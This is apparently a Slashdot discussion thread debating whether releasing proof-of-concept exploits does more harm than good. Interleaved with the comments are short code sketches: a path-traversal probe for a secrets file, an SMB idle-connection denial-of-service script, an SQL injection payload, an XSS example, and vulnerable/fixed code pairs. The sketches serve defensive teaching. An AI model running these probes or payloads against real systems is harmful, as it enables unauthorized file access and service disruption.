
Do Proof-of-Concept Exploits Do More Harm Than Good? (threatpost.com)

secwatcher writes: When it comes to the release of proof-of-concept (PoC) exploits, most security experts think the positives outweigh the negatives, according to a recent, informal Threatpost poll.

In fact, almost 60 percent of 230 security pundits thought it was a "good idea" to publish PoC code for zero days. Thirty-eight percent of respondents, meanwhile, argued it wasn't a good idea.

Dr. Richard Gold, head of security engineering at Digital Shadows, said PoC code makes it easier for security teams to do penetration testing: "Rather than having to rely on vendor notifications or software version number comparisons, a PoC allows the direct verification of whether a particular system is exploitable," Gold told Threatpost. "This ability to independently verify an issue allows organizations to better understand their exposure and make more informed decisions about remediation." Eighty-five percent of respondents said that the release of PoC code acts as an "effective motivator" to push companies to patch. Seventy-nine percent said that the disclosure of a PoC exploit has been "instrumental" in preventing an attack. And 85 percent of respondents said that a PoC code release is acceptable if a vendor won't fix a bug in a timely manner...
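
For a concrete sense of the verification Gold describes: rather than comparing version banners, a defender runs the benign probe from a published PoC and observes the answer directly. A minimal sketch in Python, with an invented endpoint, parameter, and response marker standing in for a real PoC:

    import urllib.parse
    import urllib.request

    def looks_vulnerable(host: str) -> bool:
        """Run a benign PoC probe instead of trusting the version banner."""
        # Hypothetical vulnerable endpoint: an export handler that reads
        # files outside its sandbox on unpatched builds.
        query = urllib.parse.urlencode({"file": "../../internal/secrets.conf"})
        url = f"https://{host}/api/export?{query}"
        try:
            with urllib.request.urlopen(url, timeout=5) as resp:
                body = resp.read(4096)
        except Exception:
            return False  # refused, 404, timeout: the probe did not land
        # A patched server rejects the path; a vulnerable one serves the file.
        return b"secret" in body.lower()

    print(looks_vulnerable("staging.example.com"))  # host is a placeholder

Run it only against systems you own; the point is that the answer is ground truth about exploitability, not an inference from a version string.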

On the flip side of the argument, many say the release of the Citrix PoC exploits was a bad idea: attempts to exploit the vulnerability skyrocketed as bad actors rushed in before systems were patched... Matt Thaxton, senior consultant at Crypsis Group, thinks that the "ultimate function of a PoC is to lower the bar for others to begin making use of the exploit... In many cases, PoCs are put out largely for the notoriety/fame of the publisher and for the developer to 'flex' their abilities...."

The timing of PoC releases also raises important questions about patch management for companies dealing with the fallout of publicly released code. Some, like Thaxton, say that PoC advocates fail to recognize the complexity of patching large environments: "I believe the release of PoC code functions more like an implied threat to anyone that doesn't patch: 'You'd better patch . . . or else,'" he said. "This kind of threat would likely be unacceptable outside of the infosec world. This is even more obvious when PoCs are released before or alongside a patch for the vulnerability."

And Joseph Carson, chief security scientist at Thycotic, tells Threatpost: "Let's be realistic, once a zero-day is known, it is only a matter of time before nation states and cybercriminals are abusing them."
  • by AleRunner ( 4556245 ) on Sunday January 26, 2020 @06:35PM (#59658540)

    We keep coming back to this. If security researchers don't release a PoC, the vendors say "this is a theoretical vulnerability". If the researchers don't set a deadline, software vendors put off fixes forever. If researchers identify themselves to the vendor, they get sued.

    "Responsible disclosure" has its place with clearly trustworthy vendors - like the ones that offer and actually pay bug bounties and guarantee that results can be published. For the rest, the default has to be anonymous release of PoCs and security report with at most minimal warning to vendors. It's going to be pretty rare that a security researcher actually is the first to discover a vulnerability since hackers have more motivation and money in the game. The damage this causes is less than you'd think, but the pressure it puts on vendors to behave reasonably is invaluable.

    • by Kjella ( 173770 )

      It's unreasonable to expect vendors to fix it instantly and it's unreasonable to expect all clients to patch instantly. In my opinion you should therefore give it to them in private and set two deadlines: on the first, you publicly disclose the vulnerability, so the vendor should have a patch ready before then. On the second, you publicly disclose the PoC, making exploits easy, so the customers should have patched before that. Yeah, some crooks probably have it already, but you don't need to give everyone a PoC.

      • Many PoCs are withheld, e.g. BlueKeep and a lot of the CPU issues. There are two problems with that. First, it makes it really hard to know whether you have successfully patched a system if the issue is obscure and you have no tests. Second, most of the time any programmer can build a PoC by inspecting the patches and what they changed. So you end up in a situation where the customers can't test but the hackers can.
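
        To make the patch-diffing point concrete, a sketch of the kind of before/after pair a security fix often contains; the code is invented for illustration, but the one added check tells any reader exactly what input to send to unpatched systems.

            import os

            BASE = "/srv/app/files"

            def read_file_v1(name: str) -> bytes:
                # Pre-patch: "name" is joined unchecked, so a request for
                # "../../etc/passwd" walks straight out of BASE.
                with open(os.path.join(BASE, name), "rb") as f:
                    return f.read()

            def read_file_v2(name: str) -> bytes:
                # Post-patch: resolve the final path, insist it stays under BASE.
                path = os.path.realpath(os.path.join(BASE, name))
                if not path.startswith(BASE + os.sep):
                    raise PermissionError("path traversal rejected")
                with open(path, "rb") as f:
                    return f.read()

        Diffing v1 against v2 hands an attacker the withheld PoC, while the customer with no PoC still has no way to test which version their deployment behaves like.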

        • +1. guruevi is right and Kjella is wrong. PoCs help vendors and customers far more than they help attackers.

    • If corporations don't want to be pwn3d, they shouldn't have written the exploitable code to begin with.
      • If corporations don't want to be pwn3d, they shouldn't have written the exploitable code to begin with.

        Ah, the "just don't make mistakes" strategy. Yeah, that tends to fail spectacularly. Much better to assume that the code will contain vulnerabilities, and design defense in depth plus a good patching strategy and a generous bug bounty.

        • Most companies don't have any strategy for avoiding security mistakes. If you interview their developers, a lot of them won't even know what an XSS exploit is, let alone common strategies for avoiding them. These companies are negligent.
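
          For the developers the comment describes, XSS in a nutshell: an invented comment-rendering function, first vulnerable and then fixed with standard output escaping (a sketch, not a complete defense).

              import html

              def render_unsafe(user_text: str) -> str:
                  # "<script>steal(document.cookie)</script>" executes in every
                  # visitor's browser when this string is served as HTML.
                  return f"<div class='comment'>{user_text}</div>"

              def render_safe(user_text: str) -> str:
                  # html.escape turns <, >, & and quotes into entities, so the
                  # payload is displayed as inert text instead of executed.
                  return f"<div class='comment'>{html.escape(user_text)}</div>"
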
          • Most companies don't have any strategy for avoiding security mistakes. If you interview their developers, a lot of them won't even know what an XSS exploit is, let alone common strategies for avoiding them. These companies are negligent.

            Sure, developers should be trained and take care. But that will only reduce vulnerabilities, not eliminate them.

            • A good chunk of them can be eliminated. Your team doesn't still have SQL injections, do they?
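
              The elimination strategy for that particular class, sketched with Python's built-in sqlite3: bind parameters instead of building SQL strings.

                  import sqlite3

                  conn = sqlite3.connect(":memory:")
                  conn.execute("CREATE TABLE users (name TEXT)")
                  conn.execute("INSERT INTO users VALUES ('alice')")

                  def find_unsafe(name):
                      # name = "' OR 1=1 --" rewrites the query, leaking every row
                      q = f"SELECT * FROM users WHERE name = '{name}'"
                      return conn.execute(q).fetchall()

                  def find_safe(name):
                      # the driver binds name strictly as data, never as SQL
                      q = "SELECT * FROM users WHERE name = ?"
                      return conn.execute(q, (name,)).fetchall()

                  print(find_unsafe("' OR 1=1 --"))  # [('alice',)] -- injected
                  print(find_safe("' OR 1=1 --"))    # [] -- payload stays a string
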
              • A good chunk of them can be eliminated.

                "A good chunk of them can be eliminated", means "that will only reduce vulnerabilities, not eliminate them."

                Your team doesn't still have SQL injections, do they?

                My team doesn't have SQL injections. My team doesn't use SQL. We work at the system, kernel and firmware layers. And we do a lot of work to prevent buffer overflows, integer overflows, TOCTOU errors and other race conditions. We also put a lot of effort into preventing side channel attacks, and into minimizing the effectiveness of hardware attacks. We primarily use a safe, pointer-free subset of C++.
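
                One of those classes in miniature: a TOCTOU race sketched in Python (POSIX-only, since it relies on os.O_NOFOLLOW); the paths and sizes are placeholders.

                    import os
                    import stat

                    def read_racy(path):
                        # Bug: path can be swapped for a symlink to a secret
                        # file between the islink() check and the open().
                        if os.path.islink(path):
                            raise PermissionError("no symlinks")
                        with open(path, "rb") as f:
                            return f.read()

                    def read_safe(path):
                        # Fix: the kernel refuses symlinks at open time, and
                        # fstat() inspects the file we actually opened.
                        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
                        try:
                            if not stat.S_ISREG(os.fstat(fd).st_mode):
                                raise PermissionError("not a regular file")
                            return os.read(fd, 1 << 20)
                        finally:
                            os.close(fd)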

                • Usually when someone says, "it's impossible to get rid of all security vulns" it's an excuse to write crappy code. Entirely new classes of vulnerability are rare.
                  • Usually when someone says, "it's impossible to get rid of all security vulns" it's an excuse to write crappy code. Entirely new classes of vulnerability are rare.

                    Not in my experience... especially with side channels, we get a clever new vulnerability class every other year or so. :-)

                  • Usually when someone says, "it's impossible to get rid of all security vulns" it's an excuse to write crappy code. Entirely new classes of vulnerability are rare.

                    Also, it's not really possible to eliminate all instances of known vulnerability classes either. I said "Even if you were perfect and could prevent...", figuring it was clear that I was implying that because you're human you can't. But just in case that wasn't clear: You're human. You can't.

    • Exactly. The code IS ALREADY insecure! It WILL already be exploited. You must always assume that people DO have an exploit, whether it was published or not. Withholding it only enables slacking off, and endangers people with head-in-the-sand pseudo-security ignorance.

    • We keep coming back to this. If security researchers don't release a PoC, the vendors say "this is a theoretical vulnerability".

      That's not the only issue, and there are vendors who take security seriously for whom this definitely isn't a problem. But even for them, a PoC helps them verify that they've fixed the issue. Even better, it's often not too difficult to turn a PoC into a test that can be added to the standard test suite for the product, to ensure that the vulnerability doesn't accidentally get reintroduced. I work on Android, and for Android there's another reason such PoC-based tests are valuable: Google can…
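
      The PoC-to-regression-test pattern mentioned above, sketched with an invented parser and an invented minimized payload standing in for a real PoC:

          import unittest

          def parse_record(data: bytes) -> bytes:
              # Stand-in for the patched code path under test.
              if len(data) < 4:
                  raise ValueError("truncated record")
              length = int.from_bytes(data[:4], "big")
              if length > len(data) - 4:  # the fix: bounds check before slicing
                  raise ValueError("length field exceeds buffer")
              return data[4:4 + length]

          class TestOverreadRegression(unittest.TestCase):
              # Minimized PoC input: a length field far larger than the buffer.
              POC = b"\xff\xff\xff\xff" + b"A" * 8

              def test_poc_is_rejected_cleanly(self):
                  # Pre-fix this input over-read the buffer; post-fix it must
                  # fail with a clean error, forever.
                  with self.assertRaises(ValueError):
                      parse_record(self.POC)

          if __name__ == "__main__":
              unittest.main()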

  • by Anonymous Coward
    One of the positives is that you can apply it against your systems to test. The downside is that a bad actor can adapt it. However, the risk from someone who needs to adapt the code is low compared to a bad actor competent enough to write his own from the details of the vulnerability, in which case there's no downside.
  • by Todd Knarr ( 15451 ) on Sunday January 26, 2020 @07:17PM (#59658630) Homepage

    How often have we heard a vendor dismiss a reported vulnerability with "It's strictly theoretical, there's no evidence it can actually be exploited in practice"? This is especially true of vulnerabilities like the Meltdown and Spectre families, where fixes or mitigations are either extremely difficult or impose high performance or other penalties. PoC code removes the vendor's ability to dismiss the vulnerability as impossible in practice, and the fact that PoC code needs to be released before vendors will act points to the problem being vendor attitudes, not the publication of PoC code.

    • So, as an extension to the responsible disclosure system, how about a PoC escrow? Have a responsible third party such as Mitre or Google Project Zero hold the PoC code privately with researcher attribution until the mitigating patch has been available for a couple weeks or a public exploit becomes known. Allow for early sharing with major security firms to develop antimalware and IDS signatures. The current practice of having the PoC code released along with the patch on the same day puts defenders on the back foot.
      • by Todd Knarr ( 15451 ) on Sunday January 26, 2020 @11:49PM (#59659286) Homepage

        We tried it that way already (and not even with mere escrow: researchers actively sent the PoC code along with the details to the vendors). The answer we got was vendors ignoring the submission until it was reported publicly, then dismissing it and/or actually suing the researchers in an attempt to get them to shut up about vulnerabilities. The vendors created this situation; I'll believe we can trust them after I've seen them change their ways and stop trying to dismiss or minimize the severity of reported vulnerabilities.

        "Fool me once, shame on you. Fool me twice, shame on me."

      • So, as an extension to the responsible disclosure system, how about a PoC escrow? Have a responsible third party such as Mitre or Google Project Zero hold the PoC code privately with researcher attribution until the mitigating patch has been available for a couple weeks or a public exploit becomes known.

        What would be the point of escrowing the PoC? Just send it to the vendor along with the vuln description, then give them a reasonable amount of time to fix the bug before the vuln description and PoC are published together. This is what Google Project Zero does. It seems to be the best of a set of less-than-ideal options.

  • PoC||GTFO (Score:5, Insightful)

    by phantomfive ( 622387 ) on Sunday January 26, 2020 @08:21PM (#59658762) Journal
    If a "security firm" doesn't release a proof of concept, then there's a good chance the hack isn't real. I've spent a reasonable amount of time chasing down and reproducing security exploits, and they are almost always hyped up more than justified, and a good portion of the time they are not reproducible at all.
    • On the other hand, many companies and projects won't even take a bug seriously if you don't write a PoC.

      Several years ago I found a bug in Samba that could cause a DoS (connections that were opened without traffic could spawn a hanging process for a really long time).

      I wrote a really quick and dirty report and told them how to see it, but I didn't have time to build a complete PoC that crashed a server. They left the bug report open, agreeing with my result. It took another two years for someone else to find it.
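
      The "complete PoC" being described would have amounted to little more than the following sketch: open connections, send nothing, and watch server processes pile up. Host, port, and count are placeholders; point it only at a lab server you own.

          import socket
          import time

          def open_idle_connections(host, port, count):
              socks = []
              for _ in range(count):
                  # connect, then deliberately send no traffic at all
                  socks.append(socket.create_connection((host, port), timeout=5))
              return socks

          conns = open_idle_connections("smb-lab.example", 445, 500)
          time.sleep(600)  # each idle connection may pin a server process
          for s in conns:
              s.close()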

  • You should *know* that keeping an exploit secret means nothing more than that only the bad guys have it.

    Your fallacy lies in the delusion that somebody running unsafe code is still secure as long as the hole is obscure.
    In reality, the whole point of publishing the exploit is to make everybody face the harsh truth: they are NOT secure, they could be cracked at any time, maybe already have been, and should stop running that code right freakin' NOW!!

    Your suggestion enables them to keep pretending they are secure.

  • Honestly, in the end they do more good than harm for the community. But whoever spreads this information, even without intending to use it, also has to prove and validate that it works: #PoC||GTFO. It would be best if the vendor is given the chance to patch first. If there is no patch, the internet needs to know. PoC articles should go as far as they can without simply handing 'script kiddies' a working exploit that requires no knowledge.
  • Where a language barrier or choice of vernacular can confuse an issue, PoC code always makes it clear. It not only helps people pen-test the relevant system, it also helps developers understand the nature of the problem so they can head off creating a similar problem in new code.

  • But of course they do more harm than good. Or no, they do more good than harm. It depends, as stated above, on the point of view. If you are fired because you happened to be the one managing an exploited feature of something, you may not share the view that the disclosure was good; it still may be good. Timing is of the essence, as always: the moment you publish something may decide whether it does good or harm. Someone making a proof-of-concept exploit should at least try to inform the vendor first.
